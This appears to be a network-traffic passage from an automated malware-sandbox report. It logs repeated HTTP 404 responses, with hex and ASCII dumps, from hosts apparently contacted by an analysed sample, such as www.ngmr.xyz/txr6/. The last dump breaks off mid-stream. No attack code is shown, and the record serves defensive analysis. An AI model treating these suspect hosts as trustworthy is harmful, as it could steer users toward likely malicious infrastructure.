        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33x-litespeed-tag: 894_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Fri, 04 Oct 2024 06:09:48 GMTserver: LiteSpeedData Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 a2 3b 25 f5 33 38 54 d5 ac d1 9e 9e 85 fd 5a 42 7d 9c ed cb c1 0a 07 12 a1 c2 17 41 78 3d d2 5a 04 69 74 c6 73 07 f2 d2 b0 73 b7 6d c1 6f 88 cd c0 8d 65 b0 7f ef 59 8b d8 64 84 ae a3 ec 67 d3 75 a8 83 27 50 0a a2 46 69 ca ef 14 a1 c7 2e 3a 3f fd db f8 34 58 ec cc 57 f9 1e 43 90 fa e0 a1 82 91 ec 85 c7 8f 4e 91 32 92 e3 3e 64 0f 99 67 03 33 ee f0 b0 2a 4d b7 87 ac 36 0e 1f 32 04 2f e3 43 96 2f 19 67 f3 87 6c 5d 9c d7 c5 43 46 52 82 e7 40 4a 72 fa 8b e7 43 4a fc e9 80 33 eb 4f 87 8f 36 7f 3a fc fa fd 2e 7f ba 24 d3 bb 1a 49 39 92 da e8 5a 84 a0 82 66 88 c2 22 97 67 3e 64 83 a5 15 40 ee 21 fb ea 67 42 bc 77 9c 3a 54 28 3c b2 4e 6a f6 d5 7f 7f 42 57 ad d8 8a 15 e4 7a dd 46 d9 cb 9b 7d 36 9c 5c 2b 15 82 f4 20 fa 60 e8 be 01 e6 c6 06 5e 66 d1 cd ca 3f 97 1b cb 54 27 e3 49 38 30 a9 4f 71 bb ac 3b d4 31 26 63 70 97 e5 ad a1 1a f7 6b b8 d0 07 f4 c1 97 98 b6 22 e9 b2 ae 6e 4c d8 61 f0 fe 14 5e b7 71 72 dd 7a f4 5e 1a fd 3e 18 27 0e c8 3c 86 3f 03 76 b1 49 ff 7a ff fa 3f cc 07 27 f5 41 b6 97 38 24 c9 b5 52 6e 1d af 57 12 7e 5e 1b 63 1a 52 9d 8c c8 f6 4e 7d 2d de 61 1d 62 9e f2 14 59 2d f4 49 78 56 5f a8 59 72 d7 96 d7 2a 49 91 b5 52 a9 0f 78 0e 71 48 79 ca 93 6d 22 de a0 35 0e f0 51 ea 30 2f 7e 74 4e 5c 62 64 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcP
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Fri, 04 Oct 2024 06:09:57 GMTetag: W/"66fe0220-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Fri, 04 Oct 2024 06:10:00 GMTetag: W/"66fe0220-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Fri, 04 Oct 2024 06:10:03 GMTetag: W/"66fe0220-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Fri, 04 Oct 2024 06:10:06 GMTetag: W/"66fe0220-2b5"server: nginxvary: Accept-Encodingcontent-length: 693connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 69 6d 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 a1 a3 3c 62 72 3e 0a 20 20 20 20 20 20 33 30 c9 c3 b8 e5 a4 cb a5 b7 a5 e7 a5 c3 a5 d7 a5 da a1 bc a5 b8 a4 d8 c5 be c1 f7 a4 b7 a4 de a4 b9 a1 a3 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 54 4f 50 a5 da a1 bc a5 b8 3c 2f 61 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 72 65 64 69 72 65 63 74 28 29 22 2c 20 33 30 30 30 30 29 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Fri, 04 Oct 2024 06:34:49 GMTX-Varnish: 1110524998Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Fri, 04 Oct 2024 06:34:52 GMTX-Varnish: 1110525052Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Fri, 04 Oct 2024 06:34:54 GMTX-Varnish: 1110525113Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Fri, 04 Oct 2024 06:34:57 GMTX-Varnish: 1110525150Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:12:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
